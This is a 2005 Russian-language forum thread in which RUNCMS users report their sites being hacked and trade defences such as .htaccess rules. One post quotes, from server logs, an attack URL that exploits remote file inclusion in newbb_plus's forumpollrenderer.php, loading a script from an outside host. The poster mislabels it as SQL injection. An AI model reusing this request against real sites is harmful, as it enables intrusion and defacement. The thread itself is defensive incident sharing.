Сайт сообщества | Клуб пользователей | О проекте

Имя
Пароль
ПравилаРегистрацияСправка
Сообщения за деньПоиск

Вернуться   Клуб пользователей портальной системы RUNCMS > Портал > Безопасность

Ответ
 
Опции темы Опции просмотра
LARK вне форума LARK
[исход]

Аватар для LARK

| Цитировать Старый #11 09-16-2005, 03:10

Цитата:
SVL:
Это надо делать не только в ньюбб+, а во всём движке, во всех модулях.
Добавить пару строк не трудно, но головных болей станет на много меньше.
Офтоп: Это как раз по поводу новой версии


Правила нашего Форума :: О клубе пользователей RUNCMS :: Рекомендации по публикации сообщений :: Прежде чем задать вопрос воспользуйтесь Поиском
-------------------------------------------------------------------
Если что-то не работает, задавая вопрос, ! ОБЯЗАТЕЛЬНО ! пишите версию RUNCMS/модуля/PHP/MySQL и текст самой ошибки.
Посетить домашнюю страницу LARK
  Сообщения: 4,183 c 20.09.2003 | Репутация: 223
SVL вне форума SVL
Младший участник


| Цитировать Старый #12 09-16-2005, 03:31

Цитата:
LARK:
Это как раз по поводу новой версии
Это текущая работа. имхо, безопасность важнее чем новые, будущие или не будущие возможности.
Причем такая защита используется у всех, кроме RC


Желаю, чтобы все!!!
Посетить домашнюю страницу SVL
  Сообщения: 26 c 19.01.2005 | Репутация: 2
LARK вне форума LARK
[исход]

Аватар для LARK

| Цитировать Старый #13 09-16-2005, 04:00

Цитата:
SVL:
Это текущая работа. имхо, безопасность важнее чем новые, будущие или не будущие возможности.
Как вариант, запрет на доступ к файлам с помощью .htaccess


Правила нашего Форума :: О клубе пользователей RUNCMS :: Рекомендации по публикации сообщений :: Прежде чем задать вопрос воспользуйтесь Поиском
-------------------------------------------------------------------
Если что-то не работает, задавая вопрос, ! ОБЯЗАТЕЛЬНО ! пишите версию RUNCMS/модуля/PHP/MySQL и текст самой ошибки.
Посетить домашнюю страницу LARK
  Сообщения: 4,183 c 20.09.2003 | Репутация: 223
flagman вне форума flagman
Нерешительный


| Цитировать Старый #14 09-16-2005, 11:55

Цитата:
D@rk пишет:
Могли ftp положить..ссылку на сайт дай посмотрим мож дырки какие есть...
сайт по ссылке www.fontan.info

Последний раз редактировалось flagman, 09-16-2005 в 11:59

  Сообщения: 4 c 28.08.2005 | Репутация: 1
SVL вне форума SVL
Младший участник


| Цитировать Старый #15 09-16-2005, 22:31

Цитата:
LARK:
Как вариант, запрет на доступ к файлам с помощью .htaccess
это тоже очень приличный вариант и его тоже надо использовать, но тут одно НО - некоторые хостеры не разрешают .htaccess (имхо, от такого хостера надо уходить и чем быстрее тем лучше)


Желаю, чтобы все!!!
Посетить домашнюю страницу SVL
  Сообщения: 26 c 19.01.2005 | Репутация: 2
Zormax вне форума Zormax
Старожил

Аватар для Zormax

| Цитировать Старый #16 09-17-2005, 01:22

Поздравьте меня, меня тоже взломали
Файлы удалять не стал, просто переименовал, можете заценить:
_http://sitefree.ru/index2.php
_http://sitefree.ru/index2.html


Всё для Sony Ericsson
Посетить домашнюю страницу Zormax
  Сообщения: 2,424 c 15.05.2004 | Репутация: 149
Irbis вне форума Irbis
Старший участник

Аватар для Irbis

| Цитировать Старый #17 09-17-2005, 02:42

Поздравляю.
Я как узнал, сразу все пролечил. Вроде пока тихо.
Цитата:
Как вариант, запрет на доступ к файлам с помощью .htaccess
А по падробнее нельзя, что туда вписать?
Лишняя защита не когда не помешает.

Посетить домашнюю страницу Irbis
  Сообщения: 642 c 15.02.2005 | Репутация: 52
Zormax вне форума Zormax
Старожил

Аватар для Zormax

| Цитировать Старый #18 09-17-2005, 02:46

Цитата:
Irbis:
А по падробнее нельзя, что туда вписать?
Лишняя защита не когда не помешает.
# Полный запрет доступа (только для скрипта можно и для админа через FTP)
deny from all

# Запрет на отображение содержимого каталога при отсутствии индексного файла
Options –Indexes


Всё для Sony Ericsson
Посетить домашнюю страницу Zormax
  Сообщения: 2,424 c 15.05.2004 | Репутация: 149
westex вне форума westex
Младший участник

Аватар для westex

| Цитировать Старый #19 09-17-2005, 04:39

Меня вот тоже уже второй раз так поимели. Сначала я не въехал что за бред, а на вторые сутки точно так-же как иу флагмана оставили. Слава богу когда поимели я был на месте, в логах пришлось не долго рыться. Вот такой SQL инъекцией они пользовались:
/modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.megahostbr.com/a1ts/cse.gif?&dx=1&hostxpl=http://216.111.31.2/index2.html&storage=/dir/to/my/web/dir/index.html
Четко видно что проблемма в forumpollrenderer.php. Честно говоря в пхп я не силен, по этому разбираться что к чему мне там безтолку. Предоставлю такую возможность вам Правда пока этот файл пришлось временно убрать. Форум даже вроде как и без него работает.

З.Ы. Этот файл взял из вашего фикспака, попробовал подставить этот урл, теперь вроде все тихо. Спасибо вам!

Последний раз редактировалось westex, 09-17-2005 в 04:46

  Сообщения: 48 c 06.02.2005 | Репутация: 1
Vinni вне форума Vinni
Участник


| Цитировать Старый #20 09-17-2005, 04:46

похоже меня тоже они ломали сегодня ночью...но не взломали

попытка взлома я заметил....

Сегодня в логах обгаружил такую хрень:
[Sat Sep 17 00:09:51 2005] [error] PHP Fatal error: Call to undefined function: posix_getuid() in http://www.megahostbr.com/a1ts/cse....guage//main.php on line 12


как уберечься ?

  Сообщения: 159 c 04.07.2005 | Репутация: 1
Ответ

Опции темы
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.
Быстрый переход


Рейтинг@Mail.ru Хостинг провайдер Majordomo. Powered by: vBulletin Version 3.0
Copyright ©2000-2018, Jelsoft Enterprises Ltd.
Все разделы прочитаны - Руководство форума - Архив - Вверх
Rambler's Top100
Output: 82.88 Kb. compressed to 75.60 Kb. by saving 7.28 Kb. (8.78%)
Page generated in 0.14031 seconds with 11 queries